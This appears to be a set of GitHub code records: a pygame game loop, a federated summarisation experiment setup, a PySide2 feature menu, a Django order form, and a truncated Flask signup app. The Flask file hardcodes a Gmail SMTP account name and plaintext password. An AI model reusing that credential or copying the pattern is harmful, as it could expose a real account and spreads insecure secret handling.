collideX+2*collisionBuffer):\n\t\t\t\tself.rect.y -= self.vy\n\t\t\tif self.rect.y in range(collideY-collisionBuffer, collideY+2*collisionBuffer):\n\t\t\t\tself.rect.x -= self.vx\n\t\t\tself.lastC = collideSprite\n\t\telse:\n\t\t\tself.lastC.image = self.lastC.defaultImage\n\t\t\t\n\t\t\n\nplayer = Player()\n\nall_sprites.add(player)\n\n\t\nloadMap(currentmap)\n\nwhile not crashed:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tcrashed = True\n\t\tif event.type == pygame.KEYUP:\n\t\t\tif event.key == leftKey:\n\t\t\t\tkeysPressed[1] = 0\n\t\t\tif event.key == rightKey:\n\t\t\t\tkeysPressed[3] = 0\n\t\t\tif event.key == upKey:\n\t\t\t\tkeysPressed[0] = 0\n\t\t\tif event.key == downKey:\n\t\t\t\tkeysPressed[2] = 0\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == leftKey:\n\t\t\t\tkeysPressed[1] = 1\n\t\t\tif event.key == rightKey:\n\t\t\t\tkeysPressed[3] = 1\n\t\t\tif event.key == upKey:\n\t\t\t\tkeysPressed[0] = 1\n\t\t\tif event.key == downKey:\n\t\t\t\tkeysPressed[2] = 1\n\t\n\tscreen.fill(GREEN)\n\n\t\n\tall_sprites.update()\n\tmap_sprites.draw(screen)\n\tall_sprites.draw(screen)\n\t\n\tpygame.display.update()\n\tclock.tick(30)\n\t\npygame.quit()\nquit()", "repo_name": "snickercop/explore-game", "sub_path": "explore_dirty.py", "file_name": "explore_dirty.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite.Group", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 66, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.K_a", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite.DirtySprite.__init__", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.sprite.DirtySprite.__init__", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "18554101111", "text": "import os\r\nimport pickle\r\nimport torch\r\nfrom hypothesis.BERTSUMEXT import ExtSummarizer\r\nfrom moudle.dataset import get_CNNDM_dataset, get_WikiHow_dataset, get_GovernmentReport_dataset, get_PubMed_dataset\r\nfrom moudle.dataloader import get_FL_dataloader\r\nfrom tool.logger import *\r\n\r\n\r\ndef Experiment_Create_dataset(param_dict):\r\n dataset_name = [i.strip().lower() for i in param_dict['dataset_name'].split(\",\")]\r\n data_path = []\r\n get_dataset = []\r\n\r\n if \"CNNDM\".lower() in dataset_name:\r\n # data_path = \"./dataset/CNNDM\"\r\n # get_dataset = get_CNNDM_dataset\r\n data_path.append(\"./dataset/CNNDM\")\r\n get_dataset.append(get_CNNDM_dataset)\r\n\r\n if \"WikiHow\".lower() in dataset_name:\r\n # data_path = \"./dataset/WikiHow\"\r\n # get_dataset = get_WikiHow_dataset\r\n data_path.append(\"./dataset/WikiHow\")\r\n get_dataset.append(get_WikiHow_dataset)\r\n\r\n if \"GovernmentReport\".lower() in dataset_name:\r\n # data_path = \"./dataset/GovernmentReport\"\r\n # get_dataset = get_GovernmentReport_dataset\r\n data_path.append(\"./dataset/GovernmentReport\")\r\n get_dataset.append(get_GovernmentReport_dataset)\r\n\r\n if \"PubMed\".lower() in dataset_name:\r\n # data_path = \"./dataset/PubMed\"\r\n # get_dataset = get_PubMed_dataset\r\n data_path.append(\"./dataset/PubMed\")\r\n get_dataset.append(get_PubMed_dataset)\r\n\r\n training_dataset = []\r\n validation_dataset = []\r\n testing_dataset = []\r\n for i in range(len(data_path)):\r\n g = get_dataset[i]\r\n d = data_path[i]\r\n\r\n # training_dataset.append(g(d, \"train\", only_one=False))\r\n # validation_dataset.append(g(d, \"valid\", only_one=False))\r\n # testing_dataset.append(g(d, \"test\", only_one=False))\r\n training_dataset.append(g(d, \"train\", only_one=True))\r\n validation_dataset.append(g(d, \"valid\", only_one=True))\r\n testing_dataset += g(d, \"test\", only_one=True)\r\n\r\n\r\n\r\n return training_dataset, validation_dataset, testing_dataset\r\n\r\n\r\ndef Experiment_Create_dataloader(param_dict, training_dataset, validation_dataset, testing_dataset, split_strategy=\"Uniform\"):\r\n num_clients_K = param_dict['num_clients_K']\r\n batch_size = param_dict['batch_size']\r\n\r\n # 一类数据被存储到list的一个项中\r\n data_field_number = len(training_dataset)\r\n\r\n if data_field_number == 1:\r\n training_dataloaders, client_dataset_list = get_FL_dataloader(\r\n training_dataset[-1], num_clients_K, split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n validation_dataloaders, _ = get_FL_dataloader(\r\n validation_dataset[-1], num_clients_K, split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n else:\r\n training_dataloaders = []\r\n client_dataset_list = []\r\n validation_dataloaders = []\r\n\r\n filed_size = [num_clients_K // data_field_number for i in range(data_field_number)]\r\n filed_size[-1] += num_clients_K % data_field_number\r\n\r\n for i in range(data_field_number):\r\n td, cd = get_FL_dataloader(\r\n training_dataset[i], filed_size[i], split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n vd, _ = get_FL_dataloader(\r\n validation_dataset[i], filed_size[i], split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n training_dataloaders += td\r\n client_dataset_list += cd\r\n validation_dataloaders += vd\r\n\r\n testing_dataloader = get_FL_dataloader(\r\n testing_dataset, num_clients_K, split_strategy=\"Uniform\",\r\n do_train=False, batch_size=batch_size, num_workers=0\r\n )\r\n\r\n return training_dataloaders, validation_dataloaders, client_dataset_list, testing_dataloader\r\n\r\n\r\ndef Experiment_Create_model(param_dict):\r\n if \"BERTSUMEXT\".lower() in param_dict['hypothesis'].lower():\r\n logger.info(\"Model construction (BERTSUMEXT)\")\r\n model = ExtSummarizer(classifier_type=param_dict['classifier_type'])\r\n else:\r\n logger.info(\"Model construction (AREDSUM)\")\r\n model = None\r\n model.to(param_dict['device'])\r\n return model\r\n\r\n\r\ndef Experiment_Reload_model(checkpoint_path):\r\n model = torch.load(checkpoint_path)\r\n return model", "repo_name": "AllenMa97/pFedSum", "sub_path": "moudle/experiment_setup.py", "file_name": "experiment_setup.py", "file_ext": "py", "file_size_in_byte": 4550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "moudle.dataset.get_CNNDM_dataset", "line_number": 19, "usage_type": "argument"}, {"api_name": "moudle.dataset.get_WikiHow_dataset", "line_number": 25, "usage_type": "argument"}, {"api_name": "moudle.dataset.get_GovernmentReport_dataset", "line_number": 31, "usage_type": "argument"}, {"api_name": "moudle.dataset.get_PubMed_dataset", "line_number": 37, "usage_type": "argument"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 66, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 71, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 85, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 90, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 99, "usage_type": "call"}, {"api_name": "hypothesis.BERTSUMEXT.ExtSummarizer", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "72385834364", "text": "# coding: utf-8\n\nfrom PySide2 import QtCore, QtWidgets, QtGui\n\nimport functools\n\nimport numpy as np\n\nimport constants as cst\nimport config as cfg\nfrom datasets import fit_data\nfrom datasets import timeseries_features as ts_features\n\n\nclass FeaturesMenu(QtWidgets.QPushButton):\n\n def __init__(self, text, prefix='', exclude_names=False):\n QtWidgets.QPushButton.__init__(self, text)\n\n self.features_desc = ts_features.load_features_desc()\n self.features_groups = self.features_desc['GROUPS']\n\n self.models_names = fit_data.timeseries_models_names\n\n if prefix:\n if prefix[-1] != ' ':\n prefix += ' '\n text = prefix + text[0].lower() + text[1:]\n self.features_button = QtWidgets.QPushButton(text)\n self.features_menu = QtWidgets.QMenu(\"Features\", self.features_button)\n self.features_menu.setToolTipsVisible(True)\n\n self.features_list = []\n self.features_submenus = dict()\n self.models_submenus = dict()\n self.features_actions = dict()\n\n # Top-level features: DEFAULT and NAMES\n for feat_id, _, description in cfg.features.iterateFeatures(description=True, append_formula=True):\n if exclude_names or (feat_id not in ('.DEFAULT', '.NAMES')):\n break\n self.features_list.append(feat_id)\n self.features_actions[feat_id] = QtWidgets.QAction(description, self)\n self.features_menu.addAction(self.features_actions[feat_id])\n\n # Generic submenus\n for group, description in self.features_groups.items():\n self.features_submenus[group] = self.features_menu.addMenu(description)\n self.features_submenus[group].setToolTipsVisible(True)\n # Models submenu\n for model, description in self.models_names.items():\n model_menu = self.features_submenus['MODELS']\n self.models_submenus[model] = model_menu.addMenu(description)\n self.models_submenus[model].setToolTipsVisible(True)\n\n # Generic features\n for feat_id, _, description in cfg.features.iterateFeatures(description=True, append_formula=True):\n if feat_id in ('.DEFAULT', '.NAMES'):\n continue # already done above\n self.features_list.append(feat_id)\n try:\n group, feat = feat_id.split('.')\n # print(group, feat)\n self.features_actions[feat_id] = QtWidgets.QAction(description, self)\n if group:\n # Feature in a group\n self.features_submenus[group].addAction(self.features_actions[feat_id])\n else:\n # Top-level feature, e.g. NAMES\n self.features_menu.addAction(self.features_actions[feat_id])\n except ValueError:\n # Dealing with a model\n group, model, param = feat_id.split('.')\n # print(group, model, param)\n param_path = 'metaparams/' + param\n param_desc = cfg.features.models[model].getInfo(infos=param_path + '/desc')\n param_desc_short = cfg.features.models[model].getInfo(infos=param_path + '/desc_short')\n param_formula = cfg.features.models[model].getInfo(infos=param_path + '/formula')\n if param_formula:\n param_desc_short += ': ' + param_formula\n self.features_actions[feat_id] = QtWidgets.QAction(param_desc_short, self)\n self.features_actions[feat_id].setToolTip(param_desc)\n self.models_submenus[model].addAction(self.features_actions[feat_id])\n\n self.features_button.setMenu(self.features_menu)\n\n def getButton(self):\n return self.features_button\n\n def getQActions(self):\n return self.features_actions\n\n def getFeaturesDesc(self):\n return self.features_desc\n\n\nclass FeaturesWidget(QtWidgets.QWidget):\n\n gui_to_ctrl = QtCore.Signal(dict)\n\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n\n self.id = id(self) # used to 'sign' signals\n self.sorted_text = \"\"\n self.displayed_text = \"\"\n\n self.layout = QtWidgets.QHBoxLayout()\n\n self.features_menu = FeaturesMenu('Default order',\n prefix='Sorted by')\n self.features_desc = self.features_menu.getFeaturesDesc()\n self.features_infos = self.features_desc['FEATURES']\n self.features_button = self.features_menu.getButton()\n self.features_button.setToolTip(\"Select a feature to sort and display\\n\" +\n \"SHIFT+click to sort while keeping the current feature displayed\\n\" +\n \"CONTROL+click to display a feature while keeping the current sort order\")\n self.features_actions = self.features_menu.getQActions()\n for feat_id in self.features_actions.keys():\n sort_by_feature = functools.partial(self.sortByFeatureId, feat_id)\n self.features_actions[feat_id].triggered.connect(sort_by_feature)\n self.layout.addWidget(self.features_button)\n\n # self.features_combo = gui.NoKeyEventCombo()\n # self.layout.addWidget(self.features_combo)\n # self.features_list = []\n # for feat_id, _, description in cfg.features.iterateFeatures(description=True):\n # self.features_list.append(feat_id)\n # self.features_combo.addItem(description)\n # self.features_combo.currentIndexChanged.connect(self.sortByFeature)\n\n self.sort_order = QtWidgets.QCheckBox(\"Decreasing order\")\n self.sort_order.setCheckState(QtCore.Qt.Unchecked)\n self.sort_order.setToolTip(\"Hold SHIFT to disable auto-refresh\")\n self.sort_order.stateChanged.connect(self.sortOrder)\n self.layout.addWidget(self.sort_order)\n\n # self.plot_btn = QtWidgets.QPushButton(\"Plot feature(s)\")\n # self.plot_menu = QtWidgets.QMenu(\"Features plots\", self.plot_btn)\n # self.features_plot = []\n # self.plot_single = QtWidgets.QAction(\"station-feature\")\n # self.plot_single.triggered.connect(functools.partial(self.plotFeatures, False))\n # self.plot_menu.addAction(self.plot_single)\n # self.plot_multi = QtWidgets.QAction(\"feature1-feature2\")\n # self.plot_multi.triggered.connect(functools.partial(self.plotFeatures, True))\n # self.plot_menu.addAction(self.plot_multi)\n # self.plot_btn.setMenu(self.plot_menu)\n # self.layout.addWidget(self.plot_btn)\n\n self.setLayout(self.layout)\n\n @QtCore.Slot()\n def sortByFeatureId(self, feat_id):\n kb_modifiers = QtWidgets.QApplication.keyboardModifiers()\n try:\n group, feat = feat_id.split('.')\n if group:\n name = self.features_infos[group][feat]['desc']\n formula = self.features_infos[group][feat].get('formula', '')\n else:\n name = self.features_infos[feat]['desc']\n formula = ''\n name = name[0].lower() + name[1:]\n if formula:\n name = f'{name}: {formula}'\n if kb_modifiers == QtCore.Qt.ControlModifier:\n # Display feature but keep previous sorting as is\n self.displayed_text = name\n #self.sorted_text doesn't change\n elif kb_modifiers == QtCore.Qt.ShiftModifier:\n # Sort with feature but keep previous feature displayed\n self.sorted_text = name\n #self.displayed_text doesn't change\n else:\n # By default, sort and display newly selected feature\n self.sorted_text = name\n self.displayed_text = self.sorted_text\n except ValueError:\n # Dealing with a model parameter\n _, model, param = feat_id.split('.')\n param_path = 'metaparams/' + param\n param = cfg.features.models[model].getInfo(infos=param_path + '/desc_short')\n model = cfg.features.models[model].getInfo(infos='desc_short')\n if kb_modifiers == QtCore.Qt.ControlModifier:\n # Display feature but keep previous sorting as is\n self.displayed_text = f\"{param:s} ({model:s})\"\n #self.sorted_text doesn't change\n elif kb_modifiers == QtCore.Qt.ShiftModifier:\n # Sort with feature but keep previous feature displayed\n self.sorted_text = f\"{param:s} ({model:s})\"\n #self.displayed_text doesn't change\n else:\n # By default, sort and display newly selected feature\n self.sorted_text = f\"{param:s} ({model:s})\"\n self.displayed_text = self.sorted_text\n\n if self.displayed_text == self.sorted_text:\n text = \"Sorted by \" + self.sorted_text\n else:\n text = \"Sorted by {:s}, display {:s}\".format(self.sorted_text, self.displayed_text)\n self.features_button.setText(text)\n\n message = {}\n reversed = True if self.sort_order.checkState() == QtCore.Qt.Checked else False\n if kb_modifiers == QtCore.Qt.ControlModifier:\n message.update({'DISPLAY_FEATURE': feat_id})\n elif kb_modifiers == QtCore.Qt.ShiftModifier:\n message.update({'SORT_BY': (feat_id, not reversed)})\n else:\n message.update({'DISPLAY_FEATURE': feat_id})\n message.update({'SORT_BY': (feat_id, not reversed)})\n self.send(message)\n\n @QtCore.Slot()\n def sortByFeature(self, ifeature):\n feature_id = self.features_list[ifeature]\n kb_modifiers = QtWidgets.QApplication.keyboardModifiers()\n message = {}\n reversed = True if self.sort_order.checkState() == QtCore.Qt.Checked else False\n if kb_modifiers == QtCore.Qt.ControlModifier:\n message.update({'DISPLAY_FEATURE': feat_id})\n elif kb_modifiers == QtCore.Qt.ShiftModifier:\n message.update({'SORT_BY': (feat_id, not reversed)})\n else:\n message.update({'DISPLAY_FEATURE': feat_id})\n message.update({'SORT_BY': (feature_id, not reversed)})\n self.send(message)\n\n @QtCore.Slot()\n def sortOrder(self, state):\n modifiers = QtWidgets.QApplication.keyboardModifiers()\n checked = True if state == 2 else False\n reversed = checked\n sort_message = {'SORT_BY': (None, not reversed)}\n if modifiers == QtCore.Qt.ShiftModifier:\n sort_message.update({'DELAY_SORT': True})\n self.send(sort_message)\n\n def plotFeatures(self, multi=False):\n self.features_plot.append(FeaturesPlotWindow(feat_id1=cfg.sort_by, multi=multi))\n self.features_plot[-1].show()\n\n def send(self, message):\n message['FROM'] = self.id\n self.gui_to_ctrl.emit(message)\n\n# import pyqtgraph as pg\n\n# raw_data = np.asarray(list(feature.values()))\n# scatter_data = np.zeros(len(raw_data),\n# dtype={'names':('feat1', 'feat2'),\n# 'formats':('f8', 'f8')})\n# # scatter_data['fields'] = cfg.stalist\n# scatter_data['feat1'] = np.r_[1:cfg.nsta+.5]\n# scatter_data['feat2'] = raw_data\n# scatter_data = scatter_data.view(np.recarray)\n# self.scatter = pg.ScatterPlotWidget()\n# self.scatter.setData(scatter_data)\n# self.scatter.setFields([('feat1', {'units': 'toto'}), ('feat2', {'units': 'toto'})])\n# self.scatter.show()\n# return\n", "repo_name": "yannziegler/Pygoda", "sub_path": "pygoda/gui/features_widgets.py", "file_name": "features_widgets.py", "file_ext": "py", "file_size_in_byte": 11526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 15, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton.__init__", "line_number": 18, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 18, "usage_type": "name"}, {"api_name": "datasets.timeseries_features.load_features_desc", "line_number": 20, "usage_type": "call"}, {"api_name": "datasets.timeseries_features", "line_number": 20, "usage_type": "name"}, {"api_name": "datasets.fit_data.timeseries_models_names", "line_number": 23, "usage_type": "attribute"}, {"api_name": "datasets.fit_data", "line_number": 23, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 29, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMenu", "line_number": 30, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 30, "usage_type": "name"}, {"api_name": "config.features.iterateFeatures", "line_number": 39, "usage_type": "call"}, {"api_name": "config.features", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 43, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "config.features.iterateFeatures", "line_number": 57, "usage_type": "call"}, {"api_name": "config.features", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 64, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 64, "usage_type": "name"}, {"api_name": "config.features", "line_number": 76, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 77, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 81, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 81, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 97, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 99, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget.__init__", "line_number": 102, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 108, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 108, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 120, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QCheckBox", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 132, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 133, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 133, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 154, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 154, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 166, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 170, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 170, "usage_type": "name"}, {"api_name": "config.features", "line_number": 182, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 183, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 184, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 188, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 188, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 204, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 205, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 205, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 207, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 207, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 152, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 152, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 217, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 217, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 219, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 220, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 220, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 222, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 222, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 214, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 231, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 235, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 235, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 229, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 229, "usage_type": "name"}, {"api_name": "config.sort_by", "line_number": 240, "usage_type": "attribute"}]} +{"seq_id": "39235840623", "text": "from django.forms import ModelForm, TextInput, Textarea, CheckboxInput\n\nfrom .models import Order\n\nTEXT_INPUT = TextInput(attrs={'class': 'form-control'})\n\n\nclass OrderForm(ModelForm):\n class Meta:\n model = Order\n fields = [\n 'customer_name',\n 'phone_number',\n 'email',\n 'pickup',\n 'delivery_address',\n 'comment',\n ]\n widgets = {\n 'customer_name': TEXT_INPUT,\n 'phone_number': TEXT_INPUT,\n 'email': TEXT_INPUT,\n 'pickup': CheckboxInput(attrs={'class': 'form-inline'}),\n 'delivery_address': TEXT_INPUT,\n 'comment': Textarea(attrs={\n 'class': 'form-control',\n 'rows': 3,\n }),\n }\n labels = {\n 'customer_name': 'Имя*',\n 'phone_number': 'Номер телефона*',\n 'pickup': 'Самовывоз',\n 'delivery_address': 'Полный адрес',\n 'comment': 'Комментарий',\n }\n", "repo_name": "skantaev/my_store", "sub_path": "my_store_app/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.TextInput", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Order", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.CheckboxInput", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "38701278350", "text": "# -*- coding: utf-8 -*-\nfrom flask import *\nfrom flask import session as login_session\nfrom sqlalchemy.exc import IntegrityError\nfrom model import *\nfrom werkzeug.utils import secure_filename\nimport json, ast\nimport datetime\nimport os\nfrom forms import ContactForm\nimport pyperclip\n#Firebase\n# import firebase_admin\n# from firebase_admin import credentials\n# from firebase_admin import firestore\n\n\n# Flask Mail\nfrom flask_mail import Message, Mail\n\nmail = Mail()\n\nUPLOAD_FOLDER = 'static/productsImages'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\n\napp = Flask(__name__)\napp.secret_key = \"MY_SUPER_SECRET_KEY\"\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n# Flask Mail\napp.config[\"MAIL_SERVER\"] = \"smtp.gmail.com\"\napp.config[\"MAIL_PORT\"] = 465\napp.config[\"MAIL_USE_SSL\"] = True\napp.config[\"MAIL_USERNAME\"] = 'boomboompass.game@gmail.com'\napp.config[\"MAIL_PASSWORD\"] = 'Qloai1107'\n\n\n\nmail.init_app(app)\n\n# LOCAL\nengine = create_engine('sqlite:///database.db')\n\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine, autoflush=False)\nsession = DBSession()\n\n# FIREBASE\n# cred = credentials.ApplicationDefault()\n# firebase_admin.initialize_app(cred, {\n# 'projectId': 'boom-boom-pass-website',\n# })\n\n# db = firestore.client()\n\n# doc_ref = db.collection(u'users').document(u'alovelace')\n# doc_ref.set({\n# u'first': u'Ada',\n# u'last': u'Lovelace',\n# u'born': 1815\n# })\n \n# doc_ref = db.collection(u'users').document(u'aturing')\n# doc_ref.set({\n# u'first': u'Alan',\n# u'middle': u'Mathison',\n# u'last': u'Turing',\n# u'born': 1912\n# })\n# snippets.py\n\n\ndef allowed_file(filename):\n\treturn '.' in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# @app.route('/',methods=['GET','POST'])\n@app.route('/bbp', methods=['GET','POST'])\ndef betaSignup():\n\tform = ContactForm()\n\n\tif request.method == 'POST':\n\t\tname = request.form['name']\n\t\temail = request.form['email']\n\n\t\tform.name=name\n\t\tform.email=email\n\t\tform.message=\"Good Luck!\"\n\n\t\t# if form.name != \"\" and form.email!= \"\" and form.message != \"\":\n\t\t# \tmsg = Message(\"Beta Signup!\", sender='BBP.Beta@gmail.com', recipients=['boomboompass.game@gmail.com'])\n\t\t# \tmsg.body = \"\"\"\n\t\t# \tRegistered: %s <%s>\n\t\t# \t%s\n\t\t# \t\"\"\" % (form.name, form.email, form.message)\n\t\t# \tmail.send(msg)\n\t\t# \tprint(\"message sent\")\n\n\t\tEmailObject = Emails(name=name,email=email)\n\t\tsession.add(EmailObject)\n\t\tsession.commit()\n\t\n\treturn render_template('index.html', 